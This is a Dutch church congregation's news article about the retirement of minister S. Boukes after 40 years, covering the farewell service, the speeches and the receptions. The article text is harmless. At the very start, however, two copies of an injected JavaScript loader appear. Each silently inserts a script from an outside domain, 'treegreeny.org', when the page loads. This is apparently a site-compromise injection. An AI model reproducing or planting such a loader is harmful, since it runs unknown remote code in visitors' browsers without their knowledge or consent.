;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bedankt ds. S. Boukes ! - PKN Damwâld

Bedankt ds. S. Boukes !

Gepubliceerd op: maandag 31 mei 2021

Op zondag 30 mei …  zondag Trinitatis (Drie-eenheid) … de kerkelijke naam voor de zondag na Pinksteren .. was het (helaas) zover. Na 40 jaar inzet vol enthousiasme, creativiteit en toewijding als predikant, waarvan bijna 29 jaar als gemeentepredikant in Damwâld, ging ds. S. Boukes officieel met emeritaat. Ds. Boukes was voordat hij in Damwâld kwam een aantal jaren predikant in Gees en in Giessendam-Neder-Hardinxveld.

Behalve dat het werk in Damwâld hiermee eindigt, is het ook het slot van het gemeentepredikant-zijn. Een bijzonder moment voor ds. Boukes, maar uiteraard ook voor zijn familie, vrienden en voor de gemeente. De feestelijke eredienst kon vanwege de coronamaatregelen slechts door een beperkt aantal genodigden worden bijgewoond.  Uiteraard werd de dienst rechtstreeks uitgezonden via livestream van deze website. Kerkelijk centrum De Ontmoeting in Damwâld werd voor de gelegenheid gesierd met een prachtig liturgisch bloemstuk. Ook nu had dominee Boukes weer een boeiende dienst voorbereid met uiteraard ‘de Drie-eenheid’ (Vader, Zoon en Heilige Geest) als inspiratie. Collega ds. G.J. Otter verrichte het officiële gedeelte met betrekking tot de ‘ontheffing en losmaking op eigen verzoek vanwege emeritaat’, zoals dat zo mooi in de PKN-kerkorde staat beschreven.

De aanwezigen en kijkers via de livestream konden genieten van een prachtige bijdrage van de Bernetsjerke, waarbij ds. Boukes door de kinderen niet alleen in het zonnetje werd gezet, maar ook werd ‘geadviseerd’ hoe hij het best z’n welverdiende vrije tijd kon gaan invullen. Uiteraard werd de dienst muzikaal omlijst door gospelband SIGN en organiste Margrietha Zagema, die ds. Boukes trakteerden met een groot aantal van zijn favoriete liederen en orgelstukken.

Na de dienst werd ds. Boukes toegesproken door burgemeester N.L. Agricola van de gemeente Dantumadiel, de voorzitter van de kerkenraad Janet Alkema, de voorzitter van het afscheidscomité Piet Wijbenga, ds. G.J. Otter en scriba Geralda Teertstra van ‘PKN-partnergemeente’ Hervormd Akkerwoude c.a. en het geheel werd afgesloten door ‘spreekstalmeester’ en jongerenwerker van Gereformeerd Damwâld Robert Colijn met een zegenbede. Ds. Boukes sprak volgens dankwoorden uit naar de sprekers en de gemeente voor de hartelijke woorden, de toegezongen liederen en de prachtige cadeaus die hij mocht ontvangen.

In de week voorafgaande aan de afscheidsdienst konden de gemeenteleden al afscheid nemen van dominee. Uiteraard ook geheel coronaproof! Een groot aantal mensen – van jong tot oud – kwam op 25 mei langs om ds. Boukes hartelijk te bedanken. Een uitstekend georganiseerde ‘lopende receptie’ met heerlijke lekkernijen en livemuziek van organiste Margrietha Zagema, pianist Fedde de Vries en trompettist Eddie Huizinga. Ook het afscheid voor bewoners en omwonenden van seniorenwooncentrum Nij Tjaerda op 27 mei werd druk bezocht.  Ds. Boukes schetste daar aan de hand van dia’s zijn 40-jarige predikantschap. Er waren heel veel gevoelens van dankbaarheid voor de begeleiding die de predikant aan de gemeenteleden al die jaren heeft gegeven.

De meeste mensen werken, wonen en blijven op één en dezelfde plaats. Een dominee niet, die gaat weer verder, die gaat voorbij, maar ds. Boukes bleef… en gaat nu verder op zijn levensreis zoals hij ook in zijn laatste bijdrage in nieuwsbrief DeKlok al aangaf. Met een begin en een einde dat veilig is in de handen van God. Ds. Boukes … bedankt dat u ‘onze’ herder en leraar wilde zijn!

 

KIJKTIP … Uiteraard kunt u de dienst terugkijken via deze website: hoofdpagina> klik op de livestream-banner of via You tube: https://www.youtube.com/watch?v=bdGA0GSyWpY.

Inmiddels is een  fotoselectie  – met dank aan de fotografen Roel van der Veen en Jan Wiersma – bij dit artikel gevoegd. Er komt spoedig een aanvulling.